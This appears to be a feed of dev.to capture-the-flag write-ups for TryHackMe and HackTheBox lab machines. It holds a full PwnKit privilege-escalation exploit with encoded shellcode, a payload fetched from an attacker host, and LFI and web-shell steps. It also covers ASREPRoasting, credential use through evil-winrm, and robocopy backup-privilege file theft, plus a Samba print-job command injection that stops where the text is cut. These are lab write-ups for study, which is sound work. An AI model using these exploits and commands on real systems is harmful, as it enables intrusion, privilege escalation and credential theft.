AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU= </span><span class="sh">'''</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">b64decode</span><span class="p">(</span><span class="n">payload_b64</span><span class="p">)</span> <span class="c1"># Environment passed to execve() — sets up GCONV_PATH trick </span><span class="n">environ</span> <span class="o">=</span> <span class="p">[</span> <span class="sa">b</span><span class="sh">'</span><span class="s">exploit</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">PATH=GCONV_PATH=.</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">LC_MESSAGES=en_US.UTF-8</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">XAUTHORITY=../LOL</span><span class="sh">'</span><span class="p">,</span> <span class="bp">None</span> <span class="p">]</span> <span class="c1"># Load libc to call execve() directly # Python's os.execve() requires arguments, so we bypass it via ctypes </span><span class="k">try</span><span class="p">:</span> <span class="n">libc</span> <span class="o">=</span> <span class="nc">CDLL</span><span class="p">(</span><span class="nf">find_library</span><span class="p">(</span><span class="sh">'</span><span class="s">c</span><span class="sh">'</span><span class="p">))</span> <span class="k">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Unable to find the C library, wtf?</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="c1"># Write the shared library payload to disk </span><span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[+] Creating shared library for exploit code.</span><span class="sh">'</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">payload.so</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Failed creating payload.so.</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="n">os</span><span class="p">.</span><span class="nf">chmod</span><span class="p">(</span><span class="sh">'</span><span class="s">payload.so</span><span class="sh">'</span><span class="p">,</span> <span class="mo">0o0755</span><span class="p">)</span> <span class="c1"># Create GCONV_PATH=. directory (part of the env variable trick) </span><span class="k">try</span><span class="p">:</span> <span class="n">os</span><span class="p">.</span><span class="nf">mkdir</span><span class="p">(</span><span class="sh">'</span><span class="s">GCONV_PATH=.</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span> <span class="nb">FileExistsError</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[-] GCONV_PATH=. directory already exists, continuing.</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Failed making GCONV_PATH=. directory.</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="c1"># Drop empty exploit binary into GCONV_PATH=. </span><span class="k">try</span><span class="p">:</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">GCONV_PATH=./exploit</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="sa">b</span><span class="sh">''</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Failed creating exploit file</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="n">os</span><span class="p">.</span><span class="nf">chmod</span><span class="p">(</span><span class="sh">'</span><span class="s">GCONV_PATH=./exploit</span><span class="sh">'</span><span class="p">,</span> <span class="mo">0o0755</span><span class="p">)</span> <span class="c1"># Create gconv-modules config pointing to our payload </span><span class="k">try</span><span class="p">:</span> <span class="n">os</span><span class="p">.</span><span class="nf">mkdir</span><span class="p">(</span><span class="sh">'</span><span class="s">exploit</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span> <span class="nb">FileExistsError</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[-] exploit directory already exists, continuing.</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Failed making exploit directory.</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="k">try</span><span class="p">:</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">exploit/gconv-modules</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">module UTF-8// INTERNAL ../payload 2</span><span class="se">\n</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Failed to create gconf-modules config file.</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="c1"># Convert environment to char* array </span><span class="n">environ_p</span> <span class="o">=</span> <span class="p">(</span><span class="n">c_char_p</span> <span class="o">*</span> <span class="nf">len</span><span class="p">(</span><span class="n">environ</span><span class="p">))()</span> <span class="n">environ_p</span><span class="p">[:]</span> <span class="o">=</span> <span class="n">environ</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[+] Calling execve()</span><span class="sh">'</span><span class="p">)</span> <span class="c1"># Call execve() with NULL argv — this is the core of the vulnerability </span><span class="n">libc</span><span class="p">.</span><span class="nf">execve</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">/usr/bin/pkexec</span><span class="sh">'</span><span class="p">,</span> <span class="nf">c_char_p</span><span class="p">(</span><span class="bp">None</span><span class="p">),</span> <span class="n">environ_p</span><span class="p">)</span> </code></pre> </div> <p>Save as <code>CVE-2021-4034.py</code>, host it, and pull it onto the target.</p> <p><strong>Option B — C-based exploit:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># On attack box</span> git clone https://github.com/berdav/CVE-2021-4034 <span class="nb">cd </span>CVE-2021-4034 make python3 <span class="nt">-m</span> http.server 80 </code></pre> </div> <p>Transfer and execute on the target:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>www-data@vulnnet:/<span class="nv">$ </span><span class="nb">cd</span> /tmp www-data@vulnnet:/tmp<span class="nv">$ </span>wget http://YOUR-IP/CVE-2021-4034.py </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">--2026-06-13 06:02:56-- http://YOUR-IP/CVE-2021-4034.py Connecting to YOUR-IP:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3262 (3.2K) [text/x-python] Saving to: 'CVE-2021-4034.py' </span><span class="gp">CVE-2021-4034.py 100%[================&gt;</span><span class="o">]</span> 3.19K <span class="nt">--</span>.-KB/s <span class="k">in </span>0.02s </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>www-data@vulnnet:/tmp<span class="nv">$ </span>python3 CVE-2021-4034.py </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">[+] Creating shared library for exploit code. [+] Calling execve() </span><span class="gp">#</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">root </span></code></pre> </div> <p>Root shell obtained.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># cat /home/server-management/user.txt</span> THM<span class="o">{</span>REDACTED<span class="o">}</span> <span class="c"># cat /root/root.txt</span> THM<span class="o">{</span>REDACTED<span class="o">}</span> </code></pre> </div> <h2> Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Step</th> <th>Technique</th> <th>Result</th> </tr> </thead> <tbody> <tr> <td>JS source analysis</td> <td>Hardcoded <code>referer=</code> path in bundle</td> <td>LFI entry point discovered</td> </tr> <tr> <td>LFI</td> <td><code>/index.php?referer=..//etc/apache2/...</code></td> <td> <code>.htpasswd</code> hash and vhost config leaked</td> </tr> <tr> <td>Hash cracking</td> <td> <code>john</code> with rockyou</td> <td> <code>developers</code> credentials</td> </tr> <tr> <td>vhost enum</td> <td> <code>ffuf</code> with Host header fuzzing</td> <td> <code>broadcast.vulnnet.thm</code> discovered</td> </tr> <tr> <td>File upload</td> <td>ClipBucket EDB-44250 <code>beats_uploader.php</code> </td> <td>PHP shell uploaded as <code>www-data</code> </td> </tr> <tr> <td>PrivEsc</td> <td>CVE-2021-4034 PwnKit on unpatched pkexec</td> <td>Root shell</td> </tr> </tbody> </table></div> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>nmap</td> <td>Port and service enumeration</td> </tr> <tr> <td>ffuf</td> <td>Directory and vhost brute force</td> </tr> <tr> <td>curl</td> <td>LFI exploitation and file upload</td> </tr> <tr> <td>john</td> <td>Hash cracking (Apache MD5)</td> </tr> <tr> <td>searchsploit</td> <td>ClipBucket vulnerability research</td> </tr> <tr> <td>CVE-2021-4034 PoC</td> <td>PwnKit privilege escalation</td> </tr> <tr> <td>nc</td> <td>Reverse shell listener</td> </tr> </tbody> </table></div> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>LFI via <code>referer</code> parameter in <code>index.php</code> </td> <td>Arbitrary file read — leaked Apache config and <code>.htpasswd</code> </td> </tr> <tr> <td>2</td> <td> <code>.htpasswd</code> exposed via LFI</td> <td>Crackable Apache MD5 hash → <code>developers</code> credentials</td> </tr> <tr> <td>3</td> <td>ClipBucket &lt; 4.0.0-4902 arbitrary file upload (EDB-44250)</td> <td>PHP shell upload → RCE as <code>www-data</code> </td> </tr> <tr> <td>4</td> <td>CVE-2021-4034 (PwnKit) — unpatched <code>policykit-1 0.105-20</code> </td> <td>Local privilege escalation to root</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>JS bundle → hardcoded ?referer= path → LFI confirmed → LFI: /etc/apache2/sites-enabled/000-default.conf → broadcast.vulnnet.thm + .htpasswd path → LFI: /etc/apache2/.htpasswd → developers hash → john → developers password cracked → vhost fuzz → broadcast.vulnnet.thm (401 Basic Auth, real vhost) → ClipBucket EDB-44250 beats_uploader.php → PHP shell upload (path returned in response) → curl CB_BEATS_UPLOAD_DIR/shell.php → www-data shell → CVE-2021-4034 PwnKit → root </code></pre> </div> clipbucket linux cybersecurity pwnkit TryHackMe - Fusion Corp Writeup Yogeshwar Peela Fri, 12 Jun 2026 10:01:09 +0000 https://dev.to/exploitnotes/tryhackme-fusion-corp-writeup-2dh5 https://dev.to/exploitnotes/tryhackme-fusion-corp-writeup-2dh5 <p><strong>Platform:</strong> TryHackMe<br><br> <strong>Difficulty:</strong> Easy</p> <h2> Reconnaissance </h2> <h3> Nmap </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-A</span> MACHINE-IP <span class="nt">-oA</span> nmap </code></pre> </div> <p>The scan immediately tells us this is a Domain Controller — port 88 (Kerberos), 389/3268 (LDAP), and 5985 (WinRM) are all open, with the domain name <code>fusion.corp</code> leaking out of the LDAP banner. Port 80 is also open, which is less common on a DC and worth investigating separately.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Port</th> <th>Service</th> </tr> </thead> <tbody> <tr> <td>53</td> <td>DNS (Simple DNS Plus)</td> </tr> <tr> <td>80</td> <td>HTTP (Microsoft IIS 10.0)</td> </tr> <tr> <td>88</td> <td>Kerberos</td> </tr> <tr> <td>389 / 3268</td> <td>LDAP — Domain: <code>fusion.corp</code> </td> </tr> <tr> <td>445</td> <td>SMB (signing required)</td> </tr> <tr> <td>3389</td> <td>RDP</td> </tr> <tr> <td>5985</td> <td>WinRM</td> </tr> </tbody> </table></div> <p>DC hostname: <code>Fusion-DC.fusion.corp</code></p> <h3> SMB Null Session </h3> <p>With SMB open and signing required, the first thing to check is whether null authentication is permitted — it occasionally gives us share access or user enumeration for free.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nxc smb MACHINE-IP <span class="nt">-u</span> <span class="s1">''</span> <span class="nt">-p</span> <span class="s1">''</span> </code></pre> </div> <p>Null auth is accepted, but share enumeration comes back <code>STATUS_ACCESS_DENIED</code>. Dead end for now, but confirming the domain name (<code>fusion.corp</code>) is useful for later Kerberos attacks.</p> <h2> Web Enumeration (Port 80) </h2> <p>Browsing to port 80 shows a standard IIS-hosted "eBusiness" Bootstrap template. The Team page is immediately interesting - it lists employee full names with job titles, which in an AD environment often maps directly to domain usernames.</p> <h3> Directory Brute Force </h3> <p>Before digging into the HTML, it's worth checking whether IIS is exposing anything else on the filesystem.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ffuf <span class="nt">-u</span> http://MACHINE-IP/FUZZ <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt <span class="nt">-ac</span> </code></pre> </div> <p><code>/backup/</code> returns a 301 and, crucially, has directory listing enabled. This is a misconfiguration — IIS should never serve directory listings in production, especially not from a path named <code>backup</code>.</p> <h3> employees.ods </h3> <p>Inside <code>/backup/</code> is a single file: <code>employees.ods</code>. Opening it reveals a spreadsheet with employee names and their corresponding domain usernames. The naming convention is consistent - first initial followed by surname.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Name</th> <th>Username</th> </tr> </thead> <tbody> <tr> <td>Jhon Mickel</td> <td>jmickel</td> </tr> <tr> <td>Andrew Arnold</td> <td>aarnold</td> </tr> <tr> <td>Lellien Linda</td> <td>llinda</td> </tr> <tr> <td>Jhon Powel</td> <td>jpowel</td> </tr> <tr> <td>Dominique Vroslav</td> <td>dvroslav</td> </tr> <tr> <td>Thomas Jeffersonn</td> <td>tjefferson</td> </tr> <tr> <td>Nola Maurin</td> <td>nmaurin</td> </tr> <tr> <td>Mira Ladovic</td> <td>mladovic</td> </tr> <tr> <td>Larry Parker</td> <td>lparker</td> </tr> <tr> <td>Kay Garland</td> <td>kgarland</td> </tr> <tr> <td>Diana Pertersen</td> <td>dpertersen</td> </tr> </tbody> </table></div> <p>This gives us a wordlist of 11 domain usernames. The next step is to validate which of these actually exist in AD and whether any have weak Kerberos configurations.</p> <h2> Initial Access — ASREPRoasting (lparker) </h2> <h3> Kerberos User Enumeration </h3> <p>With a list of candidate usernames and port 88 open, we can probe the KDC directly without credentials using <code>kerbrute</code>. Unlike LDAP enumeration, this doesn't require a valid session - it simply checks whether the KDC responds differently to valid vs invalid usernames.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kerbrute userenum <span class="nt">-d</span> fusion.corp <span class="nt">--dc</span> MACHINE-IP usernames.txt </code></pre> </div> <p>Only one account comes back as valid: <code>lparker@fusion.corp</code>. More importantly, kerbrute also flags that this account has <strong>Kerberos pre-authentication disabled</strong> — the condition required for ASREPRoasting.</p> <h3> ASREPRoast </h3> <p>When pre-authentication is disabled, the KDC will hand out an encrypted TGT to anyone who asks, without requiring proof of identity first. We can request it unauthenticated and attempt to crack it offline.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>impacket-GetNPUsers fusion.corp/lparker <span class="nt">-dc-ip</span> MACHINE-IP <span class="nt">-no-pass</span> </code></pre> </div> <p>The KDC returns a <code>$krb5asrep$23$</code> hash encrypted with lparker's password. Save it to <code>hash.txt</code>.</p> <h3> Hash Cracking </h3> <p>The <code>etype 23</code> (RC4) hash is crackable with a standard wordlist attack. RC4 is weak compared to AES-based Kerberos hashes, and many users still have it enabled for legacy compatibility reasons.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt hash.txt </code></pre> </div> <p>Password cracked: <code>[REDACTED]</code></p> <h3> WinRM — lparker </h3> <p>With valid credentials and WinRM open on port 5985, we get a shell directly.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>evil-winrm <span class="nt">-i</span> MACHINE-IP <span class="nt">-u</span> lparker <span class="nt">-p</span> <span class="s1">'[REDACTED]'</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\lparker\Desktop</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">type</span><span class="w"> </span><span class="nx">flag.txt</span><span class="w"> </span><span class="n">THM</span><span class="p">{</span><span class="n">REDACTED</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Lateral Movement — jmurphy (Cleartext Password in AD Comment) </h2> <p>As <code>lparker</code>, the first thing to do is understand the AD landscape — who else is on this machine, and what groups are they in. <code>net user</code> shows only a handful of accounts: <code>Administrator</code>, <code>Guest</code>, <code>krbtgt</code>, <code>lparker</code>, and <code>jmurphy</code>.</p> <p>Checking <code>jmurphy</code>'s full domain profile reveals something alarming:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">net</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="nx">jmurphy</span><span class="w"> </span><span class="nx">/domain</span><span class="w"> </span></code></pre> </div> <p>The <code>Comment</code> field — a free-text attribute in AD that admins sometimes use for notes - contains the account's plaintext password. This is a well-known AD misconfiguration and a common finding in real engagements. The account also belongs to <strong>Backup Operators</strong> and <strong>Remote Management Users</strong>, making it far more valuable than <code>lparker</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>evil-winrm <span class="nt">-i</span> MACHINE-IP <span class="nt">-u</span> jmurphy <span class="nt">-p</span> <span class="s1">'[REDACTED]'</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="o">*</span><span class="n">Evil-WinRM</span><span class="o">*</span><span class="w"> </span><span class="nx">PS</span><span class="w"> </span><span class="nx">C:\Users\jmurphy\Desktop</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">type</span><span class="w"> </span><span class="nx">flag.txt</span><span class="w"> </span><span class="n">THM</span><span class="p">{</span><span class="n">REDACTED</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Privilege Escalation — SeBackupPrivilege → Administrator Flag </h2> <p>Before reaching for a typical privesc exploit, it's worth checking what privileges and group memberships this session actually has.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">whoami</span><span class="w"> </span><span class="nx">/priv</span><span class="w"> </span><span class="n">whoami</span><span class="w"> </span><span class="nx">/groups</span><span class="w"> </span></code></pre> </div> <p><code>jmurphy</code> holds <code>SeBackupPrivilege</code> and <code>SeRestorePrivilege</code> by virtue of being in Backup Operators. These two privileges are often overlooked but are extremely powerful - <code>SeBackupPrivilege</code> instructs the kernel to bypass DACL checks when opening files with the <code>FILE_FLAG_BACKUP_SEMANTICS</code> flag. In practical terms, it means we can read any file on the filesystem regardless of ACLs, including files owned by Administrator.</p> <p>The cleanest way to exploit this via WinRM (where interactive tools like <code>diskshadow</code> fail due to the non-interactive shell) is <code>robocopy</code> with the <code>/B</code> flag, which invokes backup semantics internally.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">mkdir</span><span class="w"> </span><span class="nx">C:\tmp</span><span class="w"> </span><span class="n">robocopy</span><span class="w"> </span><span class="s2">"C:\Users\Administrator\Desktop"</span><span class="w"> </span><span class="s2">"C:\tmp"</span><span class="w"> </span><span class="s2">"flag.txt"</span><span class="w"> </span><span class="nx">/B</span><span class="w"> </span><span class="nx">/COPY:DAT</span><span class="w"> </span><span class="kr">type</span><span class="w"> </span><span class="n">C:\tmp\flag.txt</span><span class="w"> </span></code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>THM{REDACTED} </code></pre> </div> <blockquote> <p><strong>Note:</strong> <code>diskshadow</code> was attempted for a VSS-based NTDS dump but exited immediately — it requires an interactive console, which WinRM doesn't provide. For the purposes of this room, direct file theft via <code>robocopy /B</code> is sufficient. In a real engagement, <code>SeBackupPrivilege</code> would also allow dumping SAM/SYSTEM hives using <code>reg save</code> and extracting local credentials offline.</p> </blockquote> <h2> Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Step</th> <th>Technique</th> <th>Result</th> </tr> </thead> <tbody> <tr> <td>IIS dir listing</td> <td>Open <code>/backup/</code> on IIS</td> <td>Leaked <code>employees.ods</code> with usernames</td> </tr> <tr> <td>ASREPRoasting</td> <td> <code>GetNPUsers</code> + <code>john</code> </td> <td> <code>lparker</code> credentials</td> </tr> <tr> <td>WinRM</td> <td><code>evil-winrm</code></td> <td>Shell as <code>lparker</code>, Flag 1</td> </tr> <tr> <td>AD enumeration</td> <td><code>net user /domain</code></td> <td>Plaintext password in <code>jmurphy</code> Comment</td> </tr> <tr> <td>WinRM</td> <td><code>evil-winrm</code></td> <td>Shell as <code>jmurphy</code>, Flag 2</td> </tr> <tr> <td>SeBackupPrivilege</td> <td><code>robocopy /B</code></td> <td>Admin flag read</td> </tr> </tbody> </table></div> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>nmap</td> <td>Port and service enumeration</td> </tr> <tr> <td>ffuf</td> <td>Web directory brute force</td> </tr> <tr> <td>enum4linux-ng</td> <td>SMB/LDAP enumeration</td> </tr> <tr> <td>NetExec (nxc)</td> <td>SMB null session check</td> </tr> <tr> <td>kerbrute</td> <td>Kerberos username enumeration</td> </tr> <tr> <td>impacket-GetNPUsers</td> <td>ASREPRoast TGT request</td> </tr> <tr> <td>john</td> <td>Hash cracking</td> </tr> <tr> <td>evil-winrm</td> <td>WinRM shell</td> </tr> <tr> <td>robocopy</td> <td>SeBackupPrivilege file theft</td> </tr> </tbody> </table></div> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>IIS directory listing exposes <code>employees.ods</code> </td> <td>Username enumeration</td> </tr> <tr> <td>2</td> <td>ASREPRoasting on <code>lparker</code> (no pre-auth required)</td> <td>Credential theft</td> </tr> <tr> <td>3</td> <td>Plaintext password in AD user <code>Comment</code> field (<code>jmurphy</code>)</td> <td>Lateral movement</td> </tr> <tr> <td>4</td> <td> <code>jmurphy</code> member of <strong>Backup Operators</strong> with <code>SeBackupPrivilege</code> </td> <td>Admin file read via <code>robocopy /B</code> </td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IIS /backup/ → employees.ods → username list → kerbrute userenum → lparker valid → GetNPUsers ASREPRoast → crack TGT hash (john) → evil-winrm as lparker → flag 1 → net user jmurphy /domain → plaintext password in Comment → evil-winrm as jmurphy (Backup Operators) → flag 2 → SeBackupPrivilege + robocopy /B → Admin flag </code></pre> </div> cybersecurity writeup kerberos asreproasting HackTheBox - Abducted Writeup Yogeshwar Peela Thu, 11 Jun 2026 15:36:03 +0000 https://dev.to/exploitnotes/hackthebox-abducted-writeup-1f8d https://dev.to/exploitnotes/hackthebox-abducted-writeup-1f8d <p><strong>Difficulty:</strong> Medium<br> <strong>OS:</strong> Linux</p> <h2> Reconnaissance </h2> <h3> Nmap </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-A</span> &lt;MACHINE-IP&gt; <span class="nt">-oA</span> abducted </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 </span></code></pre> </div> <p>Three open ports — SSH and Samba (SMB). No web server. The NetBIOS name is <code>ABDUCTED</code> and the server string is <code>Hartley Group Document Services</code>.</p> <h3> /etc/hosts </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"&lt;MACHINE-IP&gt; abducted.htb"</span> <span class="o">&gt;&gt;</span> /etc/hosts </code></pre> </div> <h2> SMB Enumeration </h2> <p>Listing shares anonymously:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smbclient <span class="nt">-L</span> //&lt;MACHINE-IP&gt; <span class="nt">-N</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Sharename Type Comment --------- ---- ------- HP-Reception Printer Reception printer projects Disk Hartley Group Project Files transfer Disk Staff file transfer IPC$ IPC IPC Service (Hartley Group Document Services) </code></pre> </div> <p>Three shares exposed. Attempting anonymous access:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smbclient //&lt;MACHINE-IP&gt;/projects <span class="nt">-N</span> <span class="c"># NT_STATUS_ACCESS_DENIED</span> smbclient //&lt;MACHINE-IP&gt;/transfer <span class="nt">-N</span> <span class="c"># NT_STATUS_ACCESS_DENIED</span> </code></pre> </div> <p>Both disk shares require authentication. <code>HP-Reception</code> is a printer share.</p> <h3> RPC Enumeration </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>rpcclient <span class="nt">-U</span> <span class="s2">""</span> <span class="nt">-N</span> &lt;MACHINE-IP&gt; </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">rpcclient $</span><span class="o">&gt;</span> enumdomusers <span class="go">user:[scott] rid:[0x3e8] </span><span class="gp">rpcclient $</span><span class="o">&gt;</span> querydispinfo <span class="go">index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: scott Name: Scott Mercer </span><span class="gp">rpcclient $</span><span class="o">&gt;</span> netshareenum <span class="go">netname: HP-Reception path: C:\var\spool\samba netname: projects path: C:\srv\projects netname: transfer path: C:\srv\transfer </span><span class="gp">rpcclient $</span><span class="o">&gt;</span> enumprinters <span class="gp"> name:[\\&lt;MACHINE-IP&gt;</span><span class="se">\]</span> <span class="gp"> description:[\\&lt;MACHINE-IP&gt;</span><span class="se">\,</span>,Reception printer] <span class="go"> comment:[Reception printer] </span></code></pre> </div> <p>One user identified: <code>scott</code>. The printer share path maps to <code>/var/spool/samba</code> on the host.</p> <h3> SMB Protocol Versions </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">--script</span> smb-os-discovery,smb-protocols,smb2-security-mode <span class="nt">-p445</span> &lt;MACHINE-IP&gt; </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">| smb-protocols</span><span class="pi">:</span> <span class="na">| dialects</span><span class="pi">:</span> <span class="pi">|</span> <span class="err">2.0.2</span> <span class="err">|</span><span class="s"> 2.1</span> <span class="err">|</span><span class="s"> 3.0</span> <span class="err">|</span><span class="s"> 3.0.2</span> <span class="err">|</span><span class="s">_ 3.1.1</span> </code></pre> </div> <p>Samba is running with the printer share publicly accessible as guest. Noting the <code>HP-Reception</code> printer combined with recent Samba CVEs, this is the attack surface.</p> <h2> Initial Foothold — CVE-2026-4480 (Samba %J Print Injection) </h2> <p>A critical vulnerability in Samba's printing subsystem was disclosed in 2026. Samba passes the client-controlled print job description string to the configured <code>print command</code> via the <code>%J</code> substitution character <strong>without escaping shell metacharacters</strong>. An unauthenticated attacker can submit a crafted print job whose description contains shell commands, resulting in remote code execution.</p> <p>Reference: <a href="https://www.samba.org/samba/security/CVE-2026-4480.html" rel="noopener noreferrer">https://www.samba.org/samba/security/CVE-2026-4480.html</a></p> <p>The exploit works by connecting to the <code>spoolss</code> named pipe, opening the printer handle, then submitting a <code>StartDocPrinter</code> call with a job name of <code>|sh</code>. The actual shell payload is sent as the print data — Samba's <code>%J</code> substitution injects the job name into the print command, causing the shell to execute it.</p> <h3> Exploit Script (cve-2026-4480.py) </h3> <div class="highlight js-code-highlight"> <pre class="highlight 